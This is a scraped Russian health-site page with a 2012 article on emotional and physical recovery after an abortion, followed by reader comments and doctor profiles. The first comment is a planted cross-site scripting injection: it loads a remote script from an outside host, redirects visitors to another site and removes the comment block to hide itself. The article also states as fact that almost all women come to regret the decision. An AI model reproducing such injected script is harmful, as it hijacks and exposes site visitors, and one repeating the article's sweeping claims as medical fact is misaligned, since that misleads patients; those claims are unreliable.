Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Жизнь после аборта  >>  Жизнь после аборта
 
Обратная связь
 

Жизнь после аборта

Размер шрифта
04 мая 2012 09:36
  • google_analytics: false
  • Нравится

Большинство женщин, вынужденных сделать аборт, переживают его последствия очень тяжело, даже если не жалеют о своем поступке. А ведь почти все – рано или поздно – приходят к выводу, что это решение было неверным.

Если вы недавно перенесли операцию, возможно, вам до сих пор больно. Даже если чистка прошла успешно и не нанесла вам вреда, аборт – это невероятное потрясение для всего организма. Ваше тело уже сконцентрировалось на выполнении своей важнейшей функции – продолжении рода. Все системы организма перенастроились, и внезапная смена курса вызывает мощнейший гормональный сбой.

Даже если вы не ощущаете горя сейчас, это лишь значит, что вы отодвинули невыносимое переживание на потом. Психологи приравнивают ощущение потери в результате аборта к смерти близкого человека или разводу. Особенно тяжело то, что горе остается безымянным и безликим, и вы не увидели своего ребенка.

Именно теперь, после всего случившегося, вам необходимо отнестись к себе с огромной заботой и вниманием. Тем более что сейчас мало кто из окружающих способен понять ваши переживания. Не закрывайтесь от этих чувств, не таите их в себе, пока они не превратились в бомбу замедленного действия.

Как пережить этот непростой жизненный период?

  1. Не замыкайтесь в себе. Не стесняйтесь плакать. Самое лучшее, что можно теперь – объективно разобраться в причинах произошедшего, сделать выводы и жить дальше, применяя эти новые знания. Обратитесь к психологу. Даже несколько консультаций окажут вам неоценимую поддержку и помогут совладать с горем.

  2. Позаботьтесь о своем здоровье. Выполняйте рекомендации врача, избегайте физических нагрузок, соблюдайте режим. Следите за гигиеной. Ваша матка сейчас – открытая рана, и любая инфекция может иметь очень серьезные последствия. На первых порах вам просто необходимо регулярно навещать гинеколога, дабы исключить риск осложнений.

  3. Подберите надежный способ контрацепции. Наибольшей эффективностью обладает гормональная контрацепция. Современные низкодозированные таблетки практически не имеют побочных эффектов. Однако их нужно пить ежедневно, и прием нельзя пропускать. Если вы не уверены в себе, лучше обратиться к «долгоиграющим» средствам, среди которых наиболее надежна внутриматочная гормональная система. Установленная в полость матки, она не только обеспечивает надежный контрацептивный эффект, но помогает предотвратить проникновение различных инфекций.

  4. Поставьте себе цель. Горе создает в нашей жизни пустоту, вакуум, который обязательно заполнится чем-то, рано или поздно. Думайте о том, что вас окрыляет, что приносит в вашу жизнь новые впечатления и радостные эмоции. Поверьте, кто бы что ни говорил – вы заслужили счастье.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:43

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

2 - Гость

30 марта 2016 в 23:17

Цитировать   |   Пожаловаться

У меня  знакомая впала просто в жуткую депрессию после аборта, ведь муж ее бросил и к 35 годам она одна осталась. Потому что после первого аборта ей поставили диагноз бесплодие. Последствия бывают всякими, рекомендую про них почитать статью на http://posledstvia-abortov.ru

Слайдшоу

Береги грудь смолоду    
             
Причины бесплодия        
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.